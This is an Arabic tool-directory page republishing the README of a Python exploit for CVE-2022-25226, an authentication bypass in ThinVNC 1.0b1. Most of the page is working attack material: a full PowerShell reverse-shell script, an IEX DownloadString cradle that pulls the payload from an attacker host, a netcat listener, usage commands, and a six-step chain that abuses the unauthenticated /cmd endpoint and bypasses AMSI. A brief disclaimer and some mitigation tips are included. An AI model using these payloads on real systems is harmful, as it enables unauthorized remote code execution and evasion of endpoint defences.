Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/krill-x7/cve-2022-25226
الاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةالمصادقةالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubkrill-x7/cve-2022-25226

CVE-2022-25226

نص استغلال بلغة بايثون لتجاوز المصادقة في ThinVNC 1.0b1 (CVE-2022-25226) يجمع بين الوصول غير المصادق إلى نقطة النهاية /cmd مع تجاوز AMSI وحقن الحافظة لتسليم قشرة عكسية.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ThinVNC 1.0b1 – تجاوز المصادقة إلى تنفيذ الأوامر عن بُعد (CVE-2022-25226)

المؤلف: krill-x7
المرجع: https://fluidattacks.com/advisories/sinatra


نظرة عامة

يحتوي ThinVNC 1.0b1 على ثغرة تجاوز المصادقة (CVE-2022-25226) تسمح للمهاجمين عن بُعد بالتفاعل مع الواجهة الخلفية دون مصادقة. من خلال استغلال نقاط نهاية /cmd المكشوفة، يمكن للمهاجمين محاكاة ضغطات المفاتيح، وفتح PowerShell، وتجاوز AMSI، وتنفيذ أوامر عشوائية — مما يؤدي في النهاية إلى تنفيذ الأوامر عن بُعد (RCE).

يعمل هذا السكريبت على ربط هذه الأوليات معًا للحصول على شل عكسي (reverse shell) على النظام المستهدف.


إخلاء مسؤولية

هذا الكود مقدم لأغراض تعليمية فقط.
استخدمه فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها.


المتطلبات

  • Python 3
  • سكريبت الشل العكسي rev.ps1 مستضاف على جهاز المهاجم
  • مستمع (مثل Netcat) لاستقبال الشل

الاستخدام

root@kitploit:~
python3 thinvnc_rce.py -t <TARGET_IP> -tp <TARGET_PORT> -a <ATTACKER_IP> -ap <ATTACKER_PORT>

مثال

root@kitploit:~
python3 thinvnc_rce.py -t 192.168.1.100 -tp 8080 -a 192.168.1.200 -ap 8000

إعداد الحمولة (Payload)

1. إنشاء rev.ps1

احفظ هذا في ملف باسم rev.ps1.
مهم: استبدل 192.168.1.200 و 8000 بعنوان IP الخاص بالمهاجم ومنفذ الاستماع.

root@kitploit:~
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.200",8000);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()
}
$client.Close()

2. استضافة rev.ps1

من نفس المجلد:

root@kitploit:~
python3 -m http.server 8000

3. تشغيل مستمع

root@kitploit:~
nc -lvnp 8000

سير عمل الاستغلال

  1. الحصول على SID صالح عبر طلب غير مصادق إلى /cmd?cmd=connect.
  2. تشغيل هذا الـ SID مع صلاحية الوصول إلى لوحة المفاتيح/الفأرة عبر /cmd?cmd=start.
  3. إرسال مجموعة المفاتيح Ctrl+Esc لفتح قائمة ابدأ (Start menu).
  4. تشغيل PowerShell في وضع التجاوز (bypass mode).
  5. تجاوز AMSI لتعطيل حمايات PowerShell.
  6. تنفيذ حمولة الشل العكسي من خادم HTTP الخاص بك.

تنفيذ الحمولة

هذه هي الحمولة التي يتم تنفيذها في الذاكرة:

root@kitploit:~
IEX((New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/rev.ps1'))

استبدل <ATTACKER_IP> و <PORT> بعنوان IP والمنفذ الفعليين.


ملاحظات

  • يتم تنفيذ الحمولة باستخدام حقن أوامر قائم على الحافظة (clipboard-based command injection).
  • تم تضمين تجاوز AMSI لتفادي اكتشافات برامج مكافحة الفيروسات المعتمدة على PowerShell.
  • يقوم ThinVNC بتشغيل PowerShell بصلاحيات المستخدم الافتراضية — إذا كان يعمل كمسؤول (admin)، فسيكون الشل بصلاحيات مرتفعة.

الإجراءات الوقائية

  • لا تعرّض ThinVNC إلى الإنترنت.
  • احظر نقطة نهاية /cmd عبر إعدادات خادم الويب أو جدار الحماية للتطبيقات (WAF).
  • انتقل إلى بدائل آمنة ومدعومة (مثل Apache Guacamole).
  • راقب استخدام PowerShell وسلوك حقن الحافظة.

الاعتمادات

  • الاستغلال والأتمتة: krill-x7
  • اكتشاف الثغرة والإفادة الأمنية: Fluid Attacks – Advisory Sinatra
تنزيل الأداة